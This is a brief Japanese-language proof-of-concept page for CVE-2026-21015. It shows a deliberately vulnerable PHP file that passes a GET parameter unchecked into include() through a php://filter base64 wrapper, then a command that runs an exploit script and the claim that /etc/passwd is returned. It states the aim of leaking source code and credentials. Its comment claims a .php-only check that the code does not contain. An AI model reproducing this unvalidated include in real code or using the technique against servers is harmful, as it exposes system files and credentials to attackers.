
CVE-2026-21015 用の PoC エクスプロイト。PHP フィルタチェーンを悪用して、脆弱な include() 呼び出しを介して任意のファイルを読み取り、ソースコードと認証情報を漏えいさせます。
// vulnerable.php - Includes file based on user input via filter
<?php
$file = $_GET['page'];
// Attempt to sanitize by allowing only .php files, but vulnerable to filter wrapper
include("php://filter/convert.base64-encode/resource=" . $file);
PHPアプリケーションは、php://filter を使用してユーザー入力を適切に検証せずにファイルをインクルードします。攻撃者は base64エンコードフィルタとパストラバーサルを利用して、サーバー上の任意のファイルを読み取ることができます。
python exploit_php_filter.py
The content of /etc/passwd is returned.